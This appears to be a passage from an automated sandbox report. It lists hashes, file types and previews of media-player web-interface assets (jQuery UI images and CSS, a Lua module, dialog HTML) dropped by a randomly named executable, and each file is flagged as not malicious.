                                                                                                                                                                                      SHA-512:28FB253FD7EBCEC54AA2594766A244E7ADC704F828DFC4E1607F756B221EFDC255999FE0970BD7B575E16A303B6DFD656880BA8F60EAAEAF812DA7727AE7599C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR.............oX......IDAT8Oc.....&. .%F.Qb.....E.222b.bca....(1....$..........IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 1 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):115
                                                                                                                                                                                      Entropy (8bit):5.65440061388422
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlE8SWlfMqEza7yZpnLnD2F0b1p:6v/lhPhSWl0qEz9XnrqeZp
                                                                                                                                                                                      MD5:93A180CF88DD02C712A0F1ADB69F201C
                                                                                                                                                                                      SHA1:10E7AFEE0D86AEF1D82CD9EDF3A9A323DB8696BE
                                                                                                                                                                                      SHA-256:1A9CB0100308C590BD17ACE4D3541DAB56CD982AF721D0B2EA67F5D746DCAB5F
                                                                                                                                                                                      SHA-512:DC8F6F17C37FDBD7300CC8596F55186AD0118F92670DB3FDA43CECD2BD62B800AF5B4DB2B16E2EAAD8BB50E083D4B581453BEFD1054841876A8BD08009F01278
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR.............oX.....:IDAT8.c.....&. .%F.Qb....X.0........,f.,L....b.hp....`$.*T..._......IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 1 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):95
                                                                                                                                                                                      Entropy (8bit):5.24924390405304
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlE8SWlD9/TjOAMHizjVHlc/lp1p:6v/lhPhSWlkFizRi/lbp
                                                                                                                                                                                      MD5:6BDAA44E692C036B6E478B5AB08B2687
                                                                                                                                                                                      SHA1:AAC8D38E7AD1FE569B77923B2CDE3DA6FDD71A40
                                                                                                                                                                                      SHA-256:29043EC911594970261AB6C5E03DE903C1161ED13A25A377449C9C3B22134C28
                                                                                                                                                                                      SHA-512:E078684D7CAA6BA9CC5CC324325DC5C3309A8EEE8178DF55799A61B554B324FB2FB80723B4EEF163A1FA25109101F5CB8DBE290BEA5106B4444112453D615250
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR.............oX.....&IDAT8Oc......Qb..%.5.........%F.Qb...*.7.UX.....IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 500 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2627
                                                                                                                                                                                      Entropy (8bit):7.635988555591565
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:fPCXt8ReNPK52y1n5MXo3Xnl3/kBziGXtCVeZjWk0YU5pQzfIZoPRs7bX8tDhF:fPCqg9K52yp5M4nl3/Q54VeZf0rZO27M
                                                                                                                                                                                      MD5:4B92DDCABFD72C2E4CC1D4825542D8D9
                                                                                                                                                                                      SHA1:D007D4344BE5703F1DDD8A9DFE443CE6F4CA71BB
                                                                                                                                                                                      SHA-256:0307F13B51F07C8D10EDE9B29C8F43CB02024FCD2D69F04A26600A4244846AC0
                                                                                                                                                                                      SHA-512:88A780A0EDA257555F7E1BBD4E1120D1BFC2744736F77DCDF78F97595FBBF54F6CCA536A3E8860F9B3838E9E6BB6E7A5E9AC288BB7E1DC7F8E845B342DD7FF40
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR.......d.....p..}....IDATx...m{...q~.].&z....d[.+...c....a..L..'.UB...}@0...._-. .....[........[E.........:........:...t..@A....t..@A.......(........(...P........P.........:........:......p.........u....@A....t..P......7...c....[}...k........._H,..Rc..=..+..8bsK./5..x....'.l+O..I.%.6..9...1....)qW..[.T.x...y...}..2Fk?...XlS.[.L.k.....n.u..V.U...~P....u.)...'.R....y....@A....t..P...3...u....@A....Q...Q.F..6.v..9.....tO........s..XK.G...k..q...;.9k....9.Mnn{c..on.......*..9...>I.p.y..R.(..-...Y?R.Nj....>..w.....n.s....cJ..f....i.;.9.q.ol......U"oR..q.s..|...D...3g>j....._......J..}.Y.....s.9.:Gnu...f.`....9P.K~...h(...\tA.vw....{R.......s.64.T_..Z.RsJ./.Z}.2.i...Z.8[s..(.k+'....l.5..+F....xj.R9..wV,....~l.j.[sM.C.'+...{X.f...w...[yf..S....jn..#uO.u.ZgWj..=d.c....2.....t.....7...F.k...6...{J.....V.e.j....!.;1..8Ysh....k.s..NX.....*.m..W..Z.&#..~J..z...#.1Z{c.X.&#.....Q.X...7..6..RqR.q....Ry.....N|V..9#.z...V;;..tB...5
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 1 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):88
                                                                                                                                                                                      Entropy (8bit):5.047920261721794
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlEbtqNl6s0ffiaDgafWMA91lr02qg1p:6v/lhPGugLizyWvvgbup
                                                                                                                                                                                      MD5:E61F2C0C8FCB00498F21B2F3DB1E3208
                                                                                                                                                                                      SHA1:88E3777E42B562FF111BAB862A89264DA36C5FBC
                                                                                                                                                                                      SHA-256:983C3DE6ADC1D836B26E97BCB87CB29FB5B31B2FC87AE78563BD6E328907667B
                                                                                                                                                                                      SHA-512:B7156B6D0CAD02DCA8E981326C28C0E8DBFD94C1D405F289F96F04BEE4E59F3BBEAE287A2A431084655C79F2B0D62DBEEA0DE607604BA49B8F8C67716C43B459
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR.......d.....G,Z`....IDAT.Wc.....&. .B.....s)a..N....".........IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 1 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):126
                                                                                                                                                                                      Entropy (8bit):5.63027377736586
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlEbtqNlgFrkUnJBfn0ldFBXGuQBAgW3/Vp:6v/lhPGu61n/fWUAd3dp
                                                                                                                                                                                      MD5:C612FB4B1C7824A0D6ADE9AFAD391C01
                                                                                                                                                                                      SHA1:1331B2A5E54319A575E6ECF90C8187CF0F373FA6
                                                                                                                                                                                      SHA-256:46F39D964785147C69C5EF4495977C1285984A1D99AA087D650036EC6BCE8234
                                                                                                                                                                                      SHA-512:612365E28208B7E038BC726E09E068E2D70E19041B609A2D3738D39DF02255702931DB332783365DF5199927182147FD60556A08A6872282B708125EEBAD33A7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR.......d.....G,Z`...EIDAT.W.N... .B._...@#......@.U.FE.G@Z0..`..`..-.........Z.5...._..6.-...DW....IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 256 x 240, 8-bit colormap, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4194
                                                                                                                                                                                      Entropy (8bit):7.774193064913481
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:j0bmHMnm8AI8QOn+GUAOngEJPhH267qHfheCWYunxnIciUaJfI:gYAmnIoygEthHX7qHfilxjqw
                                                                                                                                                                                      MD5:483882A616C9857723899FC394E07724
                                                                                                                                                                                      SHA1:3A1BBE8FFEF42C999B26B2D4BED4A4690A1E9E3B
                                                                                                                                                                                      SHA-256:7AD54E50835A67EFBB2E9694E73D24A5DD9545DF297AFB1569992E0247ACC32C
                                                                                                                                                                                      SHA-512:F02A6A9C1AC0A9CE4E02427A75AFA4F864D571CDF57DBA988C0CC8BDEECC79846AFC5B8B90EB40C9BFD74C8E261E2D646968A1F4E779E0FDF96AD41F591467CC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR..............IJ.....PLTE$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$$"$......NtRNS...2..P...."Tp@f`.... <.BHJ.Z&0R,.4...j...8D...|.......(..$......b...l.F>n~.hh.H.....IDATx..].c....j.-kI.Zk2{.lk.n..-..tI......@....%Z2-.....|.>....H....... ......l\=.a.%f@.<,!..A....C.u..[.l...`....j...m.$..).w."..n_..Y..U....r.A.4 .5...2..v.8.`...........*0...I....;w..........(....@r.........n...e?HZ..p.]..........B..R.E........'@...A.!..........8\DR.P...5pp...5....d..X....a.7....&.k..}..........n.......p...OP.k.J...6..9.....b.w.....}.`.......".*.N.1.I............^..v..1. .o....:<..Up.7x..a.0..C&.l@N.a.;...h..}..q.."..G..n.DoH.....@D........&........*6_....!.....t.......U`....yX...\..5.:.3.B...~,E...#...D....D3.h(.k.X....D...,.@.?..3/WB.x8.8..X...;.q...F..... ......[.X
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 256 x 240, 8-bit colormap, interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5103
                                                                                                                                                                                      Entropy (8bit):7.8639695893598764
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Z5bYx5D/FqAkMBSNy3QUssDAv5jBvGJHwegc3xrfBUEETJRxoXGImDEwnC3L:38DtqfMBOy3QUsskv5wJHLgc3xr6EETA
                                                                                                                                                                                      MD5:9298AEDA82B7E456B4627E7F7876C72B
                                                                                                                                                                                      SHA1:7D7A0C57EF6D0C0C2E6899DECEAA190E05CC1EAB
                                                                                                                                                                                      SHA-256:3D9EF9C36B2407D3766FD183927E2778A1E4ABAAF2233910453BAFAF76E1F3DB
                                                                                                                                                                                      SHA-512:3AECCED36D3F43F870E02F7B61675F1597119FAB2211DDC7A38F6CDFE86D3B99E2E27F10851968A72B009D9322FC5102C364B4053753E73CBD52F9C205057ACA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR..............Nzo....PLTE$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..$..A .....NtRNS...2..P...."Tp@f`.... <.BHJ.Z&0R,.4...j...8D...|.......(..$......b...l.F>n~.hh.H....cIDATx..]k{.6.~....)..S+n..6..mw;.d.q.n.....?g>.$q%u.$.8~.. ......... ...A.....?lY..:6../.].>V..@b. ...'.x.....j..(.............D....1.p$.`....0...`.........Z..v....B...mG.<7.atJ... .=.F..LMr........ A...Sc.L.I...+...mk..N..R....5T...?..4..5mX.m.s`J.).V3.=..B.m.e..N.S...b. .h..%..:.}...CJP..N+b...h.M........1......H..5.3.iVP.k.:2.M.._...L..(X`...q..W..;r....,c.1.....+......X...%..7..d..(X.e....f%...c".4.*...[..R>w.W0..}W ..p.C..ST.q.Q.......E..(..].5...k.~.3$.).........E.a.......5n..u...<...k...Z.<...~.V.5i .C...A.7.-...O...%.{..G...(b7..]..x.~.............H}...Oj.0iMev...kc.ZMe..t..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 256 x 240, 8-bit colormap, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4194
                                                                                                                                                                                      Entropy (8bit):7.792848069193123
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:+0bmHMnm8AI8QOn+GUAOngEJPhH267qHfheCWYunxnIciUaJfI:xYAmnIoygEthHX7qHfilxjqw
                                                                                                                                                                                      MD5:4284546507EDEED79552E7E3CF6CBE66
                                                                                                                                                                                      SHA1:60213B56C68D6253BB1941BCEEA7899608FA0901
                                                                                                                                                                                      SHA-256:40A22C997402DDB59E9E344C2D0A8C4CAFE64CF4B103584208863EEC05DFA897
                                                                                                                                                                                      SHA-512:A4B86D331365629619F95391CF63FF97EF431CDF579496C716A8E10370E2FD7908C5AF5AA3EFC6B3DD93136D590C8B56B2E9837E768D97EFCAEB2457F7986D4C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR..............IJ.....PLTE..............................................................................................................................................................["....NtRNS...2..P...."Tp@f`.... <.BHJ.Z&0R,.4...j...8D...|.......(..$......b...l.F>n~.hh.H.....IDATx..].c....j.-kI.Zk2{.lk.n..-..tI......@....%Z2-.....|.>....H....... ......l\=.a.%f@.<,!..A....C.u..[.l...`....j...m.$..).w."..n_..Y..U....r.A.4 .5...2..v.8.`...........*0...I....;w..........(....@r.........n...e?HZ..p.]..........B..R.E........'@...A.!..........8\DR.P...5pp...5....d..X....a.7....&.k..}..........n.......p...OP.k.J...6..9.....b.w.....}.`.......".*.N.1.I............^..v..1. .o....:<..Up.7x..a.0..C&.l@N.a.;...h..}..q.."..G..n.DoH.....@D........&........*6_....!.....t.......U`....yX...\..5.:.3.B...~,E...#...D....D3.h(.k.X....D...,.@.?..3/WB.x8.8..X...;.q...F..... ......[.X
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 256 x 240, 8-bit colormap, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4194
                                                                                                                                                                                      Entropy (8bit):7.798227360199842
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:k0bmHMnm8AI8QOn+GUAOngEJPhH267qHfheCWYunxnIciUaJfI:nYAmnIoygEthHX7qHfilxjqw
                                                                                                                                                                                      MD5:DAB711FCB4A9AC4C4E7A03B78067190B
                                                                                                                                                                                      SHA1:186EB155681076F159E25B34464A22637205BAAB
                                                                                                                                                                                      SHA-256:1BD643299F5A35060C7057DC76B4A2138CF3723A2ED5F98A25F9C9A954EACED6
                                                                                                                                                                                      SHA-512:22F1976ACC2B2F177B83013C7751F5F49B3A10DBDB671D3ECA2E1DCDC60A9D07C90A2E6101B046CC8CAEFCA610B2DA439B7DBCFC9CB19176DD5974425A31091A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR..............IJ.....PLTE..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|..|......NtRNS...2..P...."Tp@f`.... <.BHJ.Z&0R,.4...j...8D...|.......(..$......b...l.F>n~.hh.H.....IDATx..].c....j.-kI.Zk2{.lk.n..-..tI......@....%Z2-.....|.>....H....... ......l\=.a.%f@.<,!..A....C.u..[.l...`....j...m.$..).w."..n_..Y..U....r.A.4 .5...2..v.8.`...........*0...I....;w..........(....@r.........n...e?HZ..p.]..........B..R.E........'@...A.!..........8\DR.P...5pp...5....d..X....a.7....&.k..}..........n.......p...OP.k.J...6..9.....b.w.....}.`.......".*.N.1.I............^..v..1. .o....:<..Up.7x..a.0..C&.l@N.a.;...h..}..q.."..G..n.DoH.....@D........&........*6_....!.....t.......U`....yX...\..5.:.3.B...~,E...#...D....D3.h(.k.X....D...,.@.?..3/WB.x8.8..X...;.q...F..... ......[.X
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 256 x 240, 8-bit colormap, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4194
                                                                                                                                                                                      Entropy (8bit):7.7655320771907395
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:e0bmHMnm8AI8QOn+GUAOngEJPhH267qHfheCWYunxnIciUaJfI:RYAmnIoygEthHX7qHfilxjqw
                                                                                                                                                                                      MD5:8B65D0BD69D25F6E4928D281B8B18F79
                                                                                                                                                                                      SHA1:FE83D47A2A6CA61B6AE9997C4FAFB12738A282B7
                                                                                                                                                                                      SHA-256:FDCB90174D3B2F5CB8B7A4205E60119419C728C1C76E5A2573AAA8058B6DD3A1
                                                                                                                                                                                      SHA-512:B3F4881B3F1BC9443F64E1C9B5D776AE48403368955826A05FF53F10E50236C4D9D5869785C2FD8EBCEAE720364F9F34E2E82779A1254B037A054E529399FD15
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR..............IJ.....PLTE....................................................................................................................................................................................................................................................NtRNS...2..P...."Tp@f`.... <.BHJ.Z&0R,.4...j...8D...|.......(..$......b...l.F>n~.hh.H.....IDATx..].c....j.-kI.Zk2{.lk.n..-..tI......@....%Z2-.....|.>....H....... ......l\=.a.%f@.<,!..A....C.u..[.l...`....j...m.$..).w."..n_..Y..U....r.A.4 .5...2..v.8.`...........*0...I....;w..........(....@r.........n...e?HZ..p.]..........B..R.E........'@...A.!..........8\DR.P...5pp...5....d..X....a.7....&.k..}..........n.......p...OP.k.J...6..9.....b.w.....}.`.......".*.N.1.I............^..v..1. .o....:<..Up.7x..a.0..C&.l@N.a.;...h..}..q.."..G..n.DoH.....@D........&........*6_....!.....t.......U`....yX...\..5.:.3.B...~,E...#...D....D3.h(.k.X....D...,.@.?..3/WB.x8.8..X...;.q...F..... ......[.X
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):33568
                                                                                                                                                                                      Entropy (8bit):5.0902181863183324
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:YOk7f/fb9PJgtTMH3/7oVWMW9uNxJz80JY/I:Y7/fbxJiYHv7oo4h8P/I
                                                                                                                                                                                      MD5:D83B5710E199AB81F64725CF2B7ED90E
                                                                                                                                                                                      SHA1:029959F874875F35095AEC85F6CB625A6DD51F1D
                                                                                                                                                                                      SHA-256:272013C17922C5142893BEB0655D6FE411C4F77B2A8140B4C35A4DB49AC0A8B5
                                                                                                                                                                                      SHA-512:E765CB6265B84DA9D1E32597EE65DBD9709082BDFD35E394080B5A62EB5EB0111F1771AFC52E52D131141EDD59A5D3F326DE2051C5209AB7AE827FE02FD3EC49
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: /*.. * jQuery UI CSS Framework 1.8.13.. *.. * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about).. * Dual licensed under the MIT or GPL Version 2 licenses... * http://jquery.org/license.. *.. * http://docs.jquery.com/UI/Theming/API.. */..../* Layout helpers..----------------------------------*/...ui-helper-hidden { display: none; }...ui-helper-hidden-accessible { position: absolute !important; clip: rect(1px 1px 1px 1px); clip: rect(1px,1px,1px,1px); }...ui-helper-reset { margin: 0; padding: 0; border: 0; outline: 0; line-height: 1.3; text-decoration: none; font-size: 100%; list-style: none; }...ui-helper-clearfix:after { content: "."; display: block; height: 0; clear: both; visibility: hidden; }...ui-helper-clearfix { display: inline-block; }../* required comment for clearfix to work in Opera \*/..* html .ui-helper-clearfix { height:1%; }...ui-helper-clearfix { display:block; }../* end clearfix */...ui-helper-zfix { width: 100%; height: 100%; top: 0; left: 0; position: absolute;
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):507
                                                                                                                                                                                      Entropy (8bit):4.741685073790922
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:lcsXoMIpELRjPurJYT0CX2UT4DGXYjG7cNeKsLkL3dMWsbQZ/OEZ8VT:lcs4MIpSkr2T0DUTRYy0eKhLtz0gcT
                                                                                                                                                                                      MD5:A0771B01A8C5F79CD6A330BCA0D1B4E3
                                                                                                                                                                                      SHA1:F8BB4DBDBC3EEE3B1A3A447C01D057036FF6BB83
                                                                                                                                                                                      SHA-256:F3CCBE2E1B92486F7C9E3197C1059CD5A8894536006A79D4BB67ACA3A87D73E1
                                                                                                                                                                                      SHA-512:433D2A3892BA9E740CAE1708E740E3FCB317A7BD409F39608B1D6F183089984D0DD18D5D3B2226F70FE102AD20572E4D340D259FAD25D05AC8F1C6E11F3EA41C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: -- make xgettext fetch strings from html code..function gettext(text) print(vlc.gettext._(text)) end....local _G = _G..module("custom",package.seeall)....local dialogs = setmetatable({}, {..__index = function(self, name).. -- Cache the dialogs.. return rawget(self, name) or.. rawget(rawset(self, name, process(http_dir.."/dialogs/"..name)), name)..end})...._G.dialogs = function(...).. for i=1, select("#",...) do.. dialogs[(select(i,...))]().. end..end...._G.vlm = vlc.vlm()..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):889
                                                                                                                                                                                      Entropy (8bit):5.341534437936003
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:L4vQxfwhILT3K4C8U9ILGTpQEoDwPNDRILCwHMPeoKenHYa8vSy/jGL6oihTl:Sh69C8LLqpXPNDR6+2ojHdry/jmb4x
                                                                                                                                                                                      MD5:F32AE14CA9D7673EBB23FC827D78076F
                                                                                                                                                                                      SHA1:FF5BFF0318296A910740411201CB8A4CA206B608
                                                                                                                                                                                      SHA-256:5189CDB57F5B2E8C3ADD7E6C4487F5CF8A018508C612F35C8E1305512F2176E8
                                                                                                                                                                                      SHA-512:F5E1994188C34753CDC0DC5143DCDF66A86E56B3A040C1F4B67F01FE5D443FA52F05ABFDB8717E051284E5697D4A0AC5F46D2AE36B2C518C0D5A96358F5B0F67
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...$(function(){....$('#window_batch').dialog({.....autoOpen: false,.....width: 600,.....modal: true,.....buttons:{......"<?vlc gettext("Send") ?>":function(){.......var cmds.=.$('#batchCommand').val().split("\n");.......for(var i=0;i<cmds.length;i++){........cmds[i].=.cmds[i].replace(/^#.*$/,'\n');.......}.......cmds.=.cmds.join(";").replace(/\n/g,';').replace(/;+/g,';').replace(/^;/,'');.......sendVLMCmd(cmds);.......$(this).dialog('close');......},......"<?vlc gettext("Cancel") ?>":function(){.......$(this).dialog('close');......}.....}....});...})..// ..</script>..<div id="window_batch" title="<?vlc gettext("VLM Batch Commands") ?>">..<textarea id="batchCommand" cols="50" rows="16">..<?vlc gettext("#paste your VLM commands here") ?>....<?vlc gettext("#separate commands with a new line or a semi-colon") ?>..</textarea>..</div>..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1217
                                                                                                                                                                                      Entropy (8bit):5.199702365788424
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:L4q7Qxr1QTXIL/Mc1L0foHDK/Mc1LvFF0pFxZjzwUJsLipDTXe/aooRT6hDmLTwg:pTX6UG0AHDKUGvFF0pFx18UJsLipPwa5
                                                                                                                                                                                      MD5:78F476640B27ADFDCFE6E26EDF4CC7E6
                                                                                                                                                                                      SHA1:414D54995CC46FCF5A12B826DF9B8F6F2BE21100
                                                                                                                                                                                      SHA-256:D93C774A7AEB4594F56B37E81838BA03B6855C2BBD91EB8CB803DBD413C5E571
                                                                                                                                                                                      SHA-512:DAEDDD3974908FA314D072B37ACCAF3DC0F3AB694FCD8ACDE02A77176D54710FC9115C2AB915B3B063FE3EA89308CEE9E3FD67DA1641735027AF74FC6BB8080F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <script type="text/javascript">..//<![CDATA[...var browse_target..=.'default';...$(function(){....$('#window_browse').dialog({.....autoOpen: false,.....width: 600,.....height: 650,.....modal: true,.....resizable: false,.....buttons: {......"<?vlc gettext("Open") ?>":function(){.......$('li.ui-selected','#browse_elements').each(function(){........$(this).dblclick();.......});......},......"<?vlc gettext("Enqueue") ?>": function() {.......$('li.ui-selected','#browse_elements').each(function(){........var path.=.this.getAttribute('opendir') ? this.getAttribute('opendir') : this.getAttribute('openfile');........switch(browse_target){.........default:..........sendCommand('command=in_enqueue&input='+encodeURI(path));..........setTimeout(function(){updatePlayList(true);},1000);..........break;........}.......});.......$(this).dialog("close");......},......"<?vlc gettext("Cancel") ?>" : function(){.......$(this).dialog("close")......}.....}....});...});..// ..</script>....<div id="window_br
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14859
                                                                                                                                                                                      Entropy (8bit):5.1924204464409645
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:jvlSM2AtdS0E2jSC+J3kuC6qSSSKyf+yO3zy6CGuGek+3LbnAilKyc7aSCWM2kco:jvlIATE2jJAhuDqx3J0vHEF
                                                                                                                                                                                      MD5:C38A93AE302612A55CCF7F11BDB79C37
                                                                                                                                                                                      SHA1:F6064E146909323276C6C43410F314666E35B5A4
                                                                                                                                                                                      SHA-256:FDFC3417223B88D2E8F0421CED4711760AB11A3C18A50DC05B805A0F4F1A5134
                                                                                                                                                                                      SHA-512:9C38A52C10455FFA179F0BAD0D09D50DEFDDAD25D850248A4A15EBF5AEFBE0165E12EE7EACE516CED181362062B7651C9F246C4A1C77A6DA867BC8AD978D56BE
                                                                                                                                                                                      Malicious:false
